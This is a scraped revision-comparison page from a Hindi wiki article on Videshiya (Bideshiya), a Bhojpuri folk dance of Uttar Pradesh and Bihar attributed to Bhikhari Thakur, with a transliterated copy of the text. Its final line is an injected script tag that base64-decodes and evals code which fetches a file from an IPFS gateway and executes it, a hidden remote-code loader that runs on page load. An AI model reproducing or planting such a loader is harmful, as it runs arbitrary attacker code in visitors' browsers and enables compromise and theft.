Difference between revisions of "विदेशिया नृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
*[[भारत]] में प्रचलित कुछ प्रमुख [[लोक नृत्य]] शैलियों में से एक विदेशिया नृत्य है।
+
'''विदेशिया''' अथवा '''बिदेशिया''' नृत्य [[भारत]] में प्रचलित कुछ प्रमुख [[लोक नृत्य]] शैलियों में से एक नृत्य है।
 
*यह [[उत्तर प्रदेश]] एवं [[बिहार]] राज्यों के [[भोजपुरी भाषा|भोजपुरी भाषी]] क्षेत्र का एक प्रमुख एवं ग्रामीण जनता में सर्वाधिक प्रचलित लोक-नृत्य है।  
 
*यह [[उत्तर प्रदेश]] एवं [[बिहार]] राज्यों के [[भोजपुरी भाषा|भोजपुरी भाषी]] क्षेत्र का एक प्रमुख एवं ग्रामीण जनता में सर्वाधिक प्रचलित लोक-नृत्य है।  
*इसकी रचना मूलरूप से भिखारी ठाकुर ने की थी, जबकि वर्तमान समय में इसकी तर्ज पर काफ़ी नाटकों की रचना की जा चुकी है एवं उनका नृत्य एवं गायन के माध्यम से प्रस्तुतीकरण किया जाता है।  
+
*इसकी रचना मूलरूप से [[भिखारी ठाकुर]] ने की थी, जबकि वर्तमान समय में इसकी तर्ज पर काफ़ी नाटकों की रचना की जा चुकी है एवं उनका नृत्य एवं गायन के माध्यम से प्रस्तुतीकरण किया जाता है।  
 
*इसका उद्देश्य मनोरंजन के साथ-साथ सामाजिक एवं पारिवारिक विषमताओं को उजागर करते हुए बुराईयों को समाप्त करने के लिए नीति एवं मर्यादा का उपदेश देना भी है।  
 
*इसका उद्देश्य मनोरंजन के साथ-साथ सामाजिक एवं पारिवारिक विषमताओं को उजागर करते हुए बुराईयों को समाप्त करने के लिए नीति एवं मर्यादा का उपदेश देना भी है।  
{{प्रचार}}
+
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 11: Line 11:
 
|शोध=
 
|शोध=
 
}}
 
}}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 08:15, 28 July 2012

videshiya athava bideshiya nrity bharat mean prachalit kuchh pramukh lok nrity shailiyoan mean se ek nrity hai.

  • yah uttar pradesh evan bihar rajyoan ke bhojapuri bhashi kshetr ka ek pramukh evan gramin janata mean sarvadhik prachalit lok-nrity hai.
  • isaki rachana moolaroop se bhikhari thakur ne ki thi, jabaki vartaman samay mean isaki tarj par kafi natakoan ki rachana ki ja chuki hai evan unaka nrity evan gayan ke madhyam se prastutikaran kiya jata hai.
  • isaka uddeshy manoranjan ke sath-sath samajik evan parivarik vishamataoan ko ujagar karate hue buraeeyoan ko samapt karane ke lie niti evan maryada ka upadesh dena bhi hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>